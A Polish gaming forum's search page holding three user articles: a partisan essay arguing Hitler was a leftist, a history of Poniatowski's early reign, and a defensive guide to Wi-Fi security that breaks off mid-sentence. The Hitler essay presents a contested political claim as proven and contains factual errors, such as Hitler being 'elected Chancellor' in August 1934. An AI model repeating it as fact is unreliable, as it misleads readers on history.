Skocz do zawartości
Konkurs MCFarma - Minecraft Edycja 1 ×
MISS & MISTER | WIOSNA 2024 ♥ ×
EVENT Kobiety vs Mężczyźni ×
[KONKURS] Znajdź pisanki! ×

Znajdź zawartość

Wyświetlanie wyników dla tagów '[artykuł]' .

  • Wyszukaj za pomocą tagów

    Wpisz tagi, oddzielając je przecinkami.
  • Wyszukaj przy użyciu nazwy użytkownika

Typ zawartości


Forum

  • Znajdź pisanki
    • Królik
    • Koszyczek
    • Kurczaczek
    • Babka
  • Forum główne
    • Regulaminy i Ogłoszenia
    • Sprawy dotyczące forum
    • Rekrutacja
    • Konkursy/Turnieje
    • Wesprzyj naszą sieć serwerów!
    • Redakcja CSowicze.pl
    • Liga Typera
    • Masz swoj serwer? Dołącz do Nas!
  • Strefa Banów
    • Bany Counter Strike 1.6
  • Serwery Counter Strike 1.6
    • ★ [ONLY DD2] ★ - IP: 51.83.164.138:27015
    • ★ [JAILBREAK] ★ - IP: 51.83.147.22:27015
    • ★ [ONLY AWP] ★ - IP: 188.165.19.26:27425
    • ★ [ZOMBIE PLAGUE CLASSIC] ★ - IP: 91.224.117.165:27015
    • ★ [ZOMBIE EXP] ★ - IP:
  • Serwery Counter Strike 2
    • ★ [Losowe Cheaty] ★ - IP: 146.59.108.100:27015
  • Serwery Głosowe
    • TeamSpeak 3 - Ts3Bydgoszcz
    • Discord - https://discord.gg/fuSyEeUe5X
  • Strefa Gier
    • Aktualizacje / Nowości / Ciekawostki
    • Counter Strike
    • League Of Legends
    • Download / Poradniki / Media
    • Przeceny / Darmowe Gry
    • Recenzje gier
    • Zareklamuj swoją stronę / serwer!
  • Inne
    • Offtopic
    • Muzyka
    • Giełda
  • Archiwum Forum
    • Zbanowani
    • Tematy Archiwalne

Kategorie

  • Counter Strike 1.6
    • Pluginy
    • [ReHLDS] Moduły / [AmxModX] Moduły
    • [HLDS] Moduły
    • Modele / Dodatki
    • Gotowe paczki
    • Mapy
    • Roundsoundy
  • Counter Strike Global Offensive
    • Pluginy
    • Gotowe paczki
    • Roundsoundy
    • Modele / Dodatki
  • Grafika
    • PSD
    • XCF
    • Czcionki
    • Inne
  • Invision Community 4
    • Aplikacje
    • Wtyczki
    • Szablony
    • Nulled
    • Tłumaczenia
    • Releases
  • IP.Board
    • Aplikacje / Wtyczki
    • Skiny
    • Inne dodatki
  • Inne
  • Stare pliki (brak download)

Szukaj wyników w...

Znajdź wyniki, które zawierają...


Data utworzenia

  • Od tej daty

    Do tej daty


Ostatnia aktualizacja

  • Od tej daty

    Do tej daty


Filtruj po ilości...

Dołączył

  • Od tej daty

    Do tej daty


Grupa podstawowa


Lokalizacja


Hobby


Imię


Ulubiony Serwer


Discord


Steam


Facebook


GG


Instagram


Strona WWW

Znaleziono 6 wyników

  1. Wstęp Hej, Tym razem skupię się na historycznej postaci, a mianowicie mowa o znanym akwareliście, czyli Adolfie Hitlerze. Zapisał się On w kartach historii oczywiście od bardzo złej strony i uchodzi za największego zbrodniarza na świecie, gdyż był On osobą, która jako pierwsza na szeroką skalę rozsławiła nienawiść do Żydów. Oczywiście nie zgadzam się z Jego światopoglądem i jak wiadomo rozpoczęło się to wszystko od prześladowań mniejszości narodowej żydowskiej w ówczesnej III Rzeszy, aż potem przerodziło się w obozy koncentracyjne, w których mordowano głównie Żydów i traktowano Ich w sposób nieludzki, łamiący wszelkie prawa człowieka. Może to nie jest dość głośny temat i o Nazizmie, a także o samej postaci Adolfa Hitlera. Rozpoczynając od Jego życiorysu i pewnych faktów na temat Jego życia zagłębimy się w Jego program partyjny, a także porównamy postulaty przykładowej polskiej Lewicy, czyli mowa o Lewica Razem. Zdjęcie Adolfa Hitlera Życiorys Adolf Hitler, czyli człowiek, który niechlubnie i bardzo negatywnie zapisał się w kartach historii urodził się 20 kwietnia 1889 w małym mieście, a mowa o Braunau am Inn, które leży na terytorium Austrii. Przyczyna Jego śmierci nie jest oczywista, ponieważ jest wiele teorii na ten temat, ale nie zamierzam się w to zagłębiać. Oficjalnie się mówi, że zmarł On w swoim bunkrze, wraz z żoną Evą Braun, a później Ich ciała zostały wrzucone do wykopanej głębokiej dziury i spalone. Gdy już weszło wojsko, które było przeciwnikiem III Rzeszy, to nie było już po Nich śladu, ale na przestrzeni lat wyjaśniło się w końcu, że Adolf Hitler zmarł razem z żoną właśnie w tym miejscu. Śmierć Adolfa Hitlera była już praktycznie końcem II wojny światowej w Europie, a miało to miejsce 30 kwietnia 1945 roku w stolicy Niemiec, czyli w Berlinie w Niemczech. Jeżeli chcecie zobaczyć ostatnie chwile życia Adolfa Hitlera, wraz z Jego towarzyszami to odsyłam Was chętnie do filmu pod tytułem "Upadek". Jest to smutny film i trochę jest w Nim drastycznych scen, ale jeżeli interesujecie się historią, to warto Go obejrzeć. Jego zainteresowaniami było między innymi malowanie obrazów. Jeżeli chcecie dowiedzieć się więcej na temat obrazów Adolfa Hitlera i Jego historii związanej z malowaniem to odsyłam Was pod ten LINK. Przechodząc do innych tematów jest On autorem książki, w której opisuje swoje poglądy, na przykład o zarządzaniu Państwem, o podatkach, czy nawet zdanie odnośnie mniejszości narodowych, w tym promowanie rasy panów, czyli Aryjczyków. Tytuł ten nosi nazwę "Mein Kampf" (pol. "Moja Walka"). Pisze tą książkę między innymi w więzieniu, gdy został skazany na pięć lat pozbawienia wolności, wtedy jak usiłował przejąć władzę razem z partią NSDAP. Wydarzenie to okrzyknięto nazwą "Pucz Monachijski", który miał miejsce z 8 na 9 listopada 1923 roku. Spora część osób zgodziła się z niektórymi postulatami, które proponował między innymi w swojej książce. Stąd w roku 1934, a mianowicie 2 sierpnia został wybrany na Kanclerza Niemiec i umiejętnie wprowadzał narodowy socjalizm do życia niemieckiego. Później swój światopogląd zaczynał wpajać młodym obywatelom III Rzeszy między innymi przez założenie propagandowej szkoły "Hitlerjugend". Mianowicie było to rozszerzenie tego projektu, który formalnie powstał w 1922 roku, ale na powszechną skalę w III Rzeszy rozwinął się dopiero w roku 1936, kiedy szkoła ta stała się dobrowolna dla uczniów w całym kraju, a dopiero przymusowa w 1939 roku. Niewysłanie młodzieży w określonym wieku przez ustawę wiązało się dla opiekunów z karą grzywny lub więzienia. Właśnie uczniowie w wieku od 10 do 18 lat mieli obowiązek szkolny, natomiast młodzież niezdolna do pełnienia takowego obowiązku po prostu nie była brana pod uwagę i mogła uniknąć tej szkoły. Dzięki tej szkole młodzi obywatele III Rzeszy mogli nauczyć się donosicielstwa, potępiania Żydów, wychwalania rasy Aryjskiej, słuchania propagandowej historii rządów Adolfa Hitlera (oczywiście potępiam takie zabiegi szkolne i cały ten ustrój Adolfa Hitlera). Jeżeli chcecie zobaczyć jak między innymi wyglądało szkolnictwo w III Rzeszy. W tym filmie są krótkie urywki z nauczania pewnej dziewczyny i chłopaka, więc mniej więcej można się trochę dowiedzieć na ten temat, ale nie na tym ten film jest skupiony. Mowa o tytule "Chłopiec w pasiastej piżamie", gdzie również będziecie mieli link do obejrzenia tego tytułu. Jest to historia młodego chłopca, który zaprzyjaźnił się z chłopakiem w podobnym wieku do Niego, a On był pochodzenia Żydowskiego, a ojciec tego pierwszego młodzieńca został koordynatorem obozu koncentracyjnego, w którym mordowano Żydów. Więcej nie będę Wam opowiadał na ten temat, ponieważ zapewne niektórzy nie oglądali tego tytułu, a na prawdę warto. Na głównych aspektach z życia Adolfa Hitlera się skupiliśmy, to teraz może warto przejść do głównego wątku w tym temacie: "Czy Jego poglądy były lewicowe lub prawicowe?" Na to pytanie postaram się odpowiedzieć już w wątku poniżej, a tymczasem odsyłam Was do przykładowych obrazów Adolfa Hitlera. Obrazy Adolfa Hitlera Podział między lewicę, a prawicę Poruszając ten temat sam podział uważam za trochę bezsensowny, ale jak już jest no to należy się odnieść do wątku z prawej i lewej strony. Każdy powinien mieć wyrobione swoje zdanie, jeżeli chodzi o światopogląd i nie ma co dzielić tego na lewą stronę lub prawą. Nazywajmy po prostu rzeczy po imieniu, czyli na przykład jak ktoś jest socjalistą, to reprezentuje takie poglądy, a jeśli kapitalistą to po prostu prezentuje swoje zdanie na temat wolnego rynku, bo to jest głównym tematem nurtu kapitalistycznego. Postaram się odnieść do tych wątków jak najlepiej potrafię i stwierdzić, czy Adolf Hitler był bardziej po lewej stronie lub prawej, jeżeli chodzi o światopogląd. Lewica Skupia się Ona głównie na zagadnieniach Karola Marksa, a także stara się wykształcać poglądy komunistyczne lub socjalistyczne. Weźmy pod lupę Lewicę Razem, czyli polską partię, która reprezentuje poglądy Marksistowskie pomieszane razem z komunizmem i socjalizmem, a także idzie w nowoczesną stronę i promuje tolerancję, przykładowo jeśli chodzi o ideologię LGBT+ lub popieranie Black Lives Matter, czy też osłabianie Polski na rzecz Unii Europejskiej. Mam na myśli popieranie funduszu odbudowy, który przyjęliśmy pod warunkiem, że oddamy część kompetencji Unii Europejskiej. Jest przeciwnikiem Kościoła. Program Lewicy Razem: Są to typowe postulaty socjalistyczne, na przykład ustalenie progu podatkowego w wysokości 75 procent od pensji osób zarabiających powyżej 80 tysięcy rocznie i przeznaczanie tych pieniędzy Państwu na to, żeby rozdawało je w zasiłkach socjalnych lub budowało mieszkania. Zaliczamy to właśnie pod progresję podatkową, która jest charakterystyczna dla tej partii. Zwiększanie progów podatkowych pod pretekstem równości i sprawiedliwości społecznej to Moim zdaniem jest nie fair, ale światopogląd pozostawiam już Wam. Prawica Skupia się Ona na wykształceniu głównie poglądów republikańskich, monarchijnych, kapitalistycznych, w tym wolnorynkowych. Promuje również symbole narodowe i pamięta o najważniejszych wydarzeniach w danym kraju. Można dodać, że prawica popiera również niektóre, większość lub wszystkie postulaty Kościoła. Weźmiemy Sobie pod lupę ideową polską prawicę, czyli Konfederację. Łączy Ona różne nurty polityczne między innymi kapitalizm z domieszką promowania ustroju jakim jest Monarchia, a także łączy wartości konserwatywne, tradycyjne, narodowe. Partia o nazwie Konfederacja również jest za Kościołem i jest zwolennikiem wyjścia z Unii Europejskiej. Program Konfederacji: W swojej "Piątce Konfederacji" mówią między innymi o obniżce podatków, czy też parametryzacji sądownictwa, tak by rozprawy trwały zdecydowanie krócej, niż jest to obecnie. Jeżeli chodzi o "Tezy konstytucyjne" to mówią o zmianie poszczególnych punktów w Konstytucji RP lub dodaniu nowych, czy też usunięciu niektórych. Partia NSDAP Program tej partii odwołuje się trochę do postulatów obecnej Lewicy, na przykład w Polsce. Promowanie podwyżki podatków, równości praw, czy też wprowadzanie standardów Państwa opiekuńczego. Program NSDAP: Jak napisałem wyżej niektóre postulaty programowe przypominają te bardziej Lewicowe. Korwin mówiący w telewizji rosyjskiej, że Hitler to lewicowiec: Podsumowanie Zestawiając powyższe partie można udowodnić, że Hitler był zdecydowanie bardziej lewicowcem. Większość próbuje zakłamać historię mówiąc, że tak nie jest i reprezentuje On poglądy prawicowe, ale jakby się bardziej w to zagłębić wychodzi jednak na to, że przez to jaki reprezentował światopogląd między innymi był Narodowym Socjalistą i Nazistom. Przez ten drugi pogląd polityczny stawiany jest w gronie prawicowców, którzy próbują zakłamać rzeczywistość, ale socjalizm stawia Go po stronie lewicowej. Mam nadzieję, że artykuł się spodobał. Źródło: Internet Wikipedia Filmik na rozluźnienie po przeczytaniu:
  2. Pierwsze lata czasów stanisławowskich Cześć, Tytułem wstępu wytłumaczę co oznacza pojęcie "Czasy Stanisławowskie". Jest to okres panowania ostatniego Króla elekcyjnego w Polsce, czyli Stanisława Augusta Poniatowskiego. Za Jego rządów uchwalono na przykład Konstytucję 3 Maja, czy też powstała Komisja Edukacji Narodowej. Były to dość chwiejne rządy, ponieważ Polacy wierzyli, że będzie lepiej po wprowadzeniu Jego reform, ale znaleźli się przeciwnicy i Polska w tym okresie już była coraz słabsza gospodarczo. Władza nie miała za co opłacić wojska, a trzeba było bronić dużych terenów. Wszystkie wojny, zaniedbania Szlachty, bunt Magnatów, romans Stanisława Augusta Poniatowskiego z Carycą Katarzyną II, czy inne wydarzenia doprowadziły w końcu do trzech rozbiorów Polski, ale to w późniejszej części owego artykułu. W tym artykule akurat zajmiemy się początkami przejęcia władzy przez Stanisława Augusta Poniatowskiego. Galeria Zamach stanu Czartoryskich i elekcja Króla Stanisława Augusta Poniatowskiego W Polsce panował coraz większy chaos spowodowany tym, że w naszą Politykę wtrącała się głównie Rosja, lecz Prusy i Austria też miały w tym zakresie coś do powiedzenia. Rosja próbowała narzucać Polsce swoje reformy, które podważały demokrację szlachecką i stopniowo jej się to udawało, dlatego też chcieli mieć swojego wspólnego kandydata na Króla Polski w wyborach elekcyjnych. Jeszcze za życia Augusta III, w 1763 roku, stronnictwo Czartoryskich przygotowywało zamach stanu i wprowadzenie na tron polski przedstawiciela swojego obozu z pomocą wojsk rosyjskich. Czartoryscy pragnęli zawiązać konfederację, która przy rosyjskiej pomocy ograniczyłaby rolę Augusta III i pozwoliła im przeprowadzić reformę państwa. W piśmie Anectode historique przeznaczonym dla Katarzyny, Poniatowski nakreślił plan przekształcenia Rzeczypospolitej w monarchię konstytucyjną. Postulował wprowadzenie, wzorem brytyjskiego parlamentu, sejmu trwałego, gdzie głosowano by większością. Władza wykonawcza miała spoczywać w rękach króla i dwudziestoosobowej Rady Prywatnej. Plan zakładał m.in. sprzedaż królewszczyzn i przejście wszystkich urzędników na pensję wypłacaną ze skarbu. 6 sierpnia 1763 dotarło polecenie Katarzyny II, by porzucić zamiary konfederacji za życia Augusta III. Katarzyna II w swym liście do Fryderyka II z 17 października 1763 roku ujawniła kandydaturę Stanisława Augusta Poniatowskiego. Dalszy ciąg zdarzeń doprowadził do podpisania 11 kwietnia 1764 roku porozumienia pomiędzy Rosją i Prusami odnośnie do przeprowadzenia w Rzeczypospolitej elekcji wspólnego kandydata. Wybór padł na stolnika litewskiego, czyli właśnie na Poniatowskiego, który jako były kochanek Katarzyny II i drugoplanowa postać Familii, miał gwarantować uległość wobec Rosji. Na prośbę przywódców Familii Andrzeja Zamoyskiego i Augusta Aleksandra Czartoryskiego w granice Rzeczypospolitej wkroczyły wojska rosyjskie. 20 kwietnia 1764 roku podpisał list dziękczynny do Katarzyny II za wprowadzenie wojsk rosyjskich. Katarzyna II wydała specjalną deklarację, w której zaznaczyła, że działanie to ma na celu dbałość o wszystkie swobody Rzeczypospolitej. 7 maja w Warszawie obrady rozpoczął sejm konwokacyjny, który działając pod węzłem konfederacji i wykorzystując absencję konserwatywnych posłów opozycji, przeprowadził ograniczone reformy ustrojowe. Został konsyliarzem konfederacji Czartoryskich w 1764 roku. Poniatowski został wybrany posłem ziemi warszawskiej na ten sejm. Był członkiem konfederacji generalnej Wielkiego Księstwa Litewskiego w 1764 roku, konfederacji generalnej 1764 roku i posłem na sejm konwokacyjny z ziemi warszawskiej. W końcu nadszedł moment koronacji, która odbyła się przy niewielkim udziale Szlachty i w obecności wojsk rosyjskich został wybrany Król Stanisław August Poniatowski podczas zamachu stanu 7 września 1764 roku. 25 listopada 1764, w dniu imienin carycy, arcybiskup gnieźnieński i prymas Polski Władysław Łubieński koronował go na króla Polski w kolegiacie św. Jana w Warszawie. Ku zgorszeniu tradycjonalistów wystąpił nie w stroju polskim, ale w XVI wiecznym ubiorze hiszpańskim. Pierwsze lata rządów Stanisława Augusta Poniatowskiego Wszystko zaczęło się od Sejmu Konwokacyjnego, który obradował w roku 1764. Poszczególne wydarzenia na sejmie konwokacyjnym: a) sejm konwokacyjny był sejmem skonfederowanym. Decyzje zapadały większością głosów dlatego też można było przeprowadzić na nim reformy, b) olbrzymie znaczenie podczas sejmu miał obóz Familii, w skład którego wchodziły rodzinny Czartoryskich i Potockich. Dążyły one z jednej strony do przeprowadzenia reform, a z drugiej do osadzenia na tronie Stanisława Poniatowskiego, stolnika litewskiego. Jego kandydaturę wspierała Katarzyna II, która znała go osobiście i miała na niego duży wpływ, c) Rosja nie spodziewała się, że podczas sejmu zostaną uchwalone reformy, które usprawnią polski skarb i wojsko oraz osłabią podstawy władzy magnaterii. Reformy na sejmie konwokacyjnym: powołano Komisję Skarbową dla Litwy i Korony. Sprawy wnoszone przez tę komisję na Sejm musiały być rozstrzygane większością głosów. Niestety zasada podejmowania decyzji większością głosów nie dotyczyła nakładania nowych i zwiększania istniejących podatków, powołano Komisję Wojskową, komisje te były organami kolegialnymi, kontrolowanymi i odpowiedzialnymi przed sejmem, przejęły część kompetencji hetmanów i podskarbich, ograniczając jednocześnie ich dotychczasową samowolę, wprowadzono nowy regulamin obrad ustalając kolejność poszczególnych czynności sejmu, skasowano przysięgi posłów na instrukcje poselskie, od tej pory instrukcje stały się nie zobowiązującymi zaleceniami, ogłoszono lustrację dóbr królewskich, zreformowano sądownictwo trybunalskie, rozpoczęto zakładanie stałych polskich przedstawicielstw za granicą, w miastach powołano komisje dobrego porządku (brukowanie ulic, budowanie kanałów), wzmocniono samorząd miejski, zwolniono miasta od prywatnego sądownictwa duchownego i świeckiego, wprowadzono cło generalne, znosząc przy tym prywatne cła i myta, zniesiono częściowo jurydyki szlacheckie i duchowne. Reformy Stanisława Augusta Poniatowskiego: Stanisław August Poniatowski zwoływał nieoficjalne „konferencje króla z ministrami”, organ doradczy i zarządzający, który stanowił zalążek organu władzy centralnej, uruchomiono mennicę państwową, która biła monety, wprowadzono jednolity system miar i wag w celu pobudzenia rozwoju gospodarczego, zreformowano pocztę, powołanie pierwszej państwowej Szkoły Rycerskiej w 1765 roku, powstało czasopismo "Monitor", które krytykowało zachowania części Szlachty, powołano pierwszy państwowy Teatr Narodowy. Sprawa innowierców i uchwalenie praw kardynalnych: a) przeciwko reformom sejmu konwokacyjnego wystąpiły na sejmie w 1766 r. dwory państw ościennych jak i opozycja wewnętrzna. By nie dopuścić do dalszych reform odwrócono uwagę szlachty od spraw najważniejszych. Posłużyła do tego sprawa dysydentów (innowierców), których na sejmie w roku 1733 pozbawiono praw politycznych. Caryca Katarzyna II i król Prus Fryderyk II wykorzystali walkę dysydentów o prawa by móc ingerować w wewnętrzne sprawy I RP. b) pod osłoną wojsk rosyjskich innowiercy zawiązali konfederacje w Słucku (prawosławni) i Toruniu (protestanci). Jednocześnie ambasador rosyjski Mikołaj Repnin zachęcał przeciwników reform, katolików żądających detronizacji króla, do zawiązania konfederacji generalnej w Radomiu, która wystąpiła w obronie „złotej wolności” i zażądała opieki Katarzyny II. Doszło do wojny domowej między katolikami a innowiercami, którzy razem sprzeciwiali się królowi i reformom. Katolicy poprosili o przysłanie wojsk rosyjskich i rozsądzenie sporu. c) w 1767 r. doszło do zwołania sejmu pacyfikacyjnego (1767 – 1768) tzw. sejm repninowski sejm obradował pod węzłem konfederacji radomskiej do 1768 r. miał charakter sejmu delegacyjnego – kilkudziesięciu posłów miało decydować w imieniu wszystkich przywódcy konfederacji radomskiej głośno sprzeciwiali się nadania praw politycznych dysydentom. Rosjanie aresztowali więc biskupa Stanisława Sołtyka, biskupa Andrzeja Załuskiego, hetmana Wacława Rzewuskiego i jego syna Seweryna by wywrzeć presję na reszcie, sejm przywrócił równouprawnienie dysydentów, obalił niektóre reformy Czartoryskich opracował tzw. prawa kardynalne. Prawa te zatwierdzały podstawowe zasady ustroju państwa i gwarantowały przewagę szlachty lub chroniły interesy magnatów. Prawa kardynalne: wybór króla tylko na drodze wolnej elekcji, liberum veto, artykuły henrykowskie, a szczególnie prawo wypowiadania posłuszeństwa królowi, wyłączne prawo szlachty do piastowania urzędów, wyłączne prawo szlachty do posiadania ziemi, pacta conventa, władzę szlachty nad chłopami. Katarzyna II na Sejmie w 1768 roku zezwoliła na wprowadzenie pewnych reform: wyodrębniono tzw. materie status i materie ekonomiczne. Uchwały w sprawie materii status miały zapadać jednomyślnie na sejmie „wolnym”. Decyzje w sprawach ekonomicznych (mniej ważnych) miały zapadać większością głosów. Niestety nadal 3 wymagano jednomyślności w sprawach: stanowienia podatków, sprawach monetarnych, ustalaniu liczby wojska, zwoływaniu pospolitego ruszenia, zawierania przymierzy i traktatów z obcymi państwami, zmianami zakresu kompetencji urzędów i sądów, porządku obrad sejmów i sejmików, nadawanie szlachectwa cudzoziemcom o Polakom, unormowano tok obrad sejmowych i wprowadzono nowy regulamin obrad sejmowych, na sejmikach ziemskich miała obowiązywać zasada podejmowania uchwał większością głosów, szlachta gołota utraciła prawo uczestniczenia w sejmikach ziemskich – tej reformy nie wprowadzono w życie. Za pierwszych lat rządów Stanisława Augusta Poniatowskiego doszło również do Konfederacji Barskiej w latach 1768-1772, która ostatecznie doprowadziła do pierwszego rozbioru Polski w 1772 roku. Po pierwszym rozbiorze Polski zwołano Sejm Rozbiorowy: a) Sejm rozbiorowy zwołany do Warszawy w 1773 r. pod presją obcych wojsk i przy udziale wielu przekupionych posłów ratyfikował konwencję rozbiorową. Nie pomógł protest Tadeusza Rejtana, który nie chciał dopuścić posłów do izby i własnym ciałem zagrodził wejście (nie chciał by zatwierdzono zawiązanie konfederacji sejmowej zaproponowanej przez zdradzieckiego marszałka izby poselskiej Adama Ponińskiego). b) Sejm zatwierdził traktaty handlowe z trzema zaborcami, bardzo niekorzystne dla RP. c) W 1775 r. uchwalił on nowe prawa kardynalne poszerzając prawa z 1768 r. o zakaz powoływania na tron cudzoziemca oraz dzieci i wnuków panującego. Gwarantem praw kardynalnych stały się wszystkie państwa zaborcze. Pozytywną stroną praw kardynalnych było to, że chroniły przed anarchią, miały także gwarantować niepodzielność terytorium państwowego. d) Na sejmie tym przeprowadzono również szereg ważnych reform: powołano nowy organ władzy centralnej – Radę Nieustającą. Składał się z 36 członków wybieranych przez sejm spośród posłów i senatorów na 2 lata. Dzieliła się na 5 departamentów (ministerstw): interesów cudzoziemskich (spraw zagranicznych), policji, wojska, sprawiedliwości, skarbu. Każdy z nich liczył 4 – 8 członków. Zadaniem Rady było kierowanie sprawami państwa w okresie pomiędzy sejmami. Rada ograniczyła uprawnienia monarchy, który jej przewodniczył. Stanisław August Poniatowski potrafił wykorzystać Radę do 5 wprowadzenia w życie szeregu swoich zamierzeń. Uchwały w Radzie zapadały większością głosów, a podpisywał je król, pierwszy rangą senator i marszałek Rady. Rada podlegała kontroli sejmu, któremu składała sprawozdania ze swojej działalności. Sejm mógł uchylić decyzje podejmowane przez Radę, a jej członków postawić przed sądem sejmowym. Rada mogła wywrzeć olbrzymi wpływ na sytuację w RP. Miała jednak wielu wrogów. Magnackim oligarchom nie odpowiadało to, że król uczynił z Rady narzędzie swojej polityki. Obóz patriotyczny widział w Radzie tylko organ narzucony przez obce państwa i podporządkowany Rosji. Król utracił prawo: zwoływania sejmu, nadawania królewszczyzn, powoływania ministrów i senatorów, mianowania oficerów i starostów, wydawania poleceń organom administracyjnym. W 1773 roku utworzono Komisję Edukacji Narodowej i Ona przeprowadziła następujące reformy: RP podzielono na dwa okręgi szkolne: Koronę i Litwę, które podlegały dwóm szkołom wyższym Akademii Krakowskiej i Wileńskiej, Akademie te zamieniono w Szkoły Główne, Szkołom Głównym podporządkowano szkoły wydziałowe (7 letnie) i podwydziałowe (6 letnie) – szkolnictwo średnie, Szkoły parafialne zostały upaństwowione i zeświecczone, Zreformowano Szkoły Główne: w miejsce wykładów wprowadzono nauki oparte na eksperymencie, większy nacisk położono na naukę historii i geografii ojczystej, wprowadzono naukę praktycznych umiejętności i ćwiczenia fizyczne, ograniczono łacinę na rzecz astronomii i matematyki, fizyki czy geologii, medycyny, Towarzystwo do Ksiąg Elementarnych oprócz programów nauczania opracowało elementarz by podnieść poziom szkół elementarnych, Do programu nauczania szkół podlegających KEN wprowadzono nauki matematyczno – przyrodnicze i położono nacisk na ich praktyczne wykorzystanie, ważnym elementem stała się nauka historii Polski, prawa krajowego, etyki świeckiej, nauki języków nowożytnych oraz przysposobienia wojskowego. Towarzystwo Ksiąg Elementarnych utworzono w 1775 roku, którego celem było wydawanie podręczników, opracowywanie programów szkolnych oraz kontrolowanie działalności pedagogicznej szkół. Źródła: Wikipedia Tomaszewska *Praca Mojego autorstwa z zebranymi informacjami z powyższych źródeł, którą pokazywałem na swoim poprzednim forum. Chciałbym się podzielić ją również tutaj. Została rozszerzona o galerię.
  3. Sposobów zabezpieczeń sieci jest bardzo wiele, ich skuteczność i złożoność zależy w głównej mierze od doświadczenia i pomysłowości administratora. W przypadku sieci WLAN pole do popisu jest odrobinę mniejsze, istnieje bowiem kilka ogólnie znanych i wykorzystywanych metod ochrony (nie oznacza to wcale, że nie ma sieci zabezpieczonych `nietypowo`). Pierwszą czynnością zwiększająca bezpieczeństwo naszej sieci bezprzewodowej powinno być ustawienie hasła w AP. Jest to krok, którego nie możemy pominąć jeśli myślimy poważnie o ochronie Wi-Fi. Jeżeli mamy taką możliwość postawmy AP za firewallem. Niektóre Punkty Dostępowe posiadają opcję regulacji mocy. Możemy ją zmniejszyć, aby zasięg AP nie wychodził poza pomieszczenie, w którym jest ustawiony - nie ma potrzeby dzielenia się Internetem z sąsiadami. Przedstawiam najbardziej znane metody zabezpieczeń sieci Wi-Fi. Wyłączenie rozgłaszania SSID (Service Set IDentifier) [poziom bezpieczeństwa - zerowy] Jest to jeden z najmniej skutecznych sposobów zabezpieczeń sieci bezprzewodowej. Osoba chcąca połączyć się z naszą siecią, musi podać jej nazwę. Ukrycie SSID ani odrobinę nie podnosi poziomu bezpieczeństwa, zdobycie ukrytej nazwy sieci to kwestia kilku minut. Wspominam o tym z czystej formalności. Filtrowanie adresów MAC [poziom bezpieczeństwa - bardzo niski] Technika ta polega na ustawieniu w Punkcie Dostępowym listy adresów kart sieciowych, które legalnie mogą korzystać z sieci. Jeżeli adres MAC klienta nie znajduje się na tej liście, nie uzyska on połączenia z siecią. Przy tym rodzaju zabezpieczenia, często stosuje się usługę DHCP, która przydziela konkretne IP danemu adresowi MAC. Jeżeli w swojej sieci planujesz wprowadzić filtrację MAC pomyśl też o innych zabezpieczeniach, gdyż to jest niewystarczające. WEP (Wired Equivalent Privacy) [poziom bezpieczeństwa - bardzo niski] Szyfrowanie połączenia z użyciem klucza WEP jest jednym z najczęsciej stosowanych rodzajów zabezpieczeń i obecnie dostępne jest w każdym AP. Polega ono na ustawieniu hasła, które każdy klient musi podać zanim uzyska dostęp do sieci. Jeżeli zdecydujesz się na stosowanie tego typu zabezpieczenia i twój AP posiada taka opcję, użyj klucza 128 (13-znakowe hasło) zamiast 64 bitowego. Fakt, iż sieć jest zabezpieczona w widoczny sposób (każdy skaner sieci bezprzewodowej to pokaże) odstraszy przynajmniej część osób chcących się do niej dostać. Z pozoru może wydawać się to skuteczną metodą ochrony sieci, jednak WEP podatny jest na różne formy ataków (ze względu na wektor inicjujący (IV). Co prawda są to techniki czasochłonne, jednak napewno znajdzie się ktoś kto zechce przełamać to zabezpieczenie. Oprócz tego ta metoda szyfrowania, w pewnym stopniu, obciąża naszą sieć. Jeśli jednak masz wybierać pomiędzy szyfrowaniem WEP lub jego brakiem, wybierz to pierwsze - uchronisz swoje hasła i inne ważne informacje przed dostaniem się w niepowołane ręce. Pomimo wad szyfrowania WEP nadaje się ono znakomicie jako jedna z warstw chroniących twoją sieć. WPA (Wi-Fi Protected Access) [poziom bezpieczeństwa - wysoki*] WPA zostało wprowadzone jako następca szyfrowania WEP, bezpieczniejsze i pozbawione wad poprzednika. Jedynym minusem tego zabezpieczenia jest dosyć spore obciążanie sieci WPA dzieli się na dwa rodzaje: Personal (opiera się na kluczu PSK (długość od 8 do 63 znaków), bez którego nie nawiążemy połączenia z siecią) oraz Enterprise (korzystający z serwera RADIUS). Niestety szyfrowanie WPA nie jest dostępne w każdym AP, jeśli jednak twój Punkt Dostępowy oraz karty klienckie je obsługują i dla bezpieczeństwa sieci zrobisz wszystko - użyj właśnie WPA. Należy wspomnieć też o WPA2, które poza inną metodą szyfrowania (AES-CCMP) nie różni się niczym w porównaniu do WPA (RC4/TKIP). *Szyfrowanie WPA jest bezpieczne tylko przy stosowaniu długich, niestandardowych haseł (najlepiej maksymalnej długości), bowiem inne są podatne na ataki słownikowe. RADIUS (Remote Authentication Dial-In User Service) [poziom bezpieczeństwa - wysoki] RADIUS jest protokołem, umożliwiającym autentykację, autoryzację oraz rozliczanie (AAA - Authencication, Authorization, Accounting). Schemat działania jest bardzo prosty: klient chcący uzyskać dostęp, np. do Internetu wysyła do urządzenia NAS (Network Access Server, którego rolę w sieciach bezprzewodowych pełni Access Point) swój adres MAC. Jest on przesyłany do serwera RADIUS, na którym zapisane są informacje o wszystkich autoryzowanych użytkownikach (login, hasło, adres MAC). Jeżeli dany adres MAC znajdował się na serwerze, zostaje wysłana prośba o podanie loginu i hasła. Gdy weryfikacja przebiegnie poprawnie klient uzyska dostęp do sieci. Mimo, że login oraz hasło, których używamy przy logowaniu się do serwera RADIUS są szyfrowane (MD5), należałoby zabezpieczyć także całe nasze połączenie (WEP/WPA). Minusem RADIUSa jest konieczność postawienia dodatkowego serwera, na którym mógłby on działać oraz to, że nie każdy AP potrafi z nim współpracować. Jednym z najbardziej znanych serwerów RADIUS jest freeradius (http://www.freeradius.org). VPN (Virtual Private Network) [poziom bezpieczeństwa - wysoki] Dzięki VPN, za pośrednictwem publicznej sieci (Internetu), możemy utworzyć bezpieczny tunel pomiędzy dwoma klientami/sieciami prywatnymi/klientem a siecią prywatną. (PPTP (Point-to-Point Tunneling Protocol)). W celu autentykacji stosuje się zazwyczaj kombinację login oraz hasło/certyfikaty/klucze prywatne. Jednym ze sposobów podniesienia bezpieczeństwa sieci VPN jest zastosowanie zbioru protokołów kryptograficznych znanych jako IPsec. Gwarantuje on, że dane które przesyłamy przez Internet pozostają w niezmienionej formie oraz są praktycznie nie do odczytania dla nikogo poza adresatem/odbiorcą (użycie szyfrowania). Na chwilę obecną jest to najbezpieczniejszy i najskuteczniejszy sposób zabezpieczania sieci bezprzewodowych. Przedstawione tu metody ochrony sieci WLAN zostały opisane skrótowo, bez zagłębiania się w 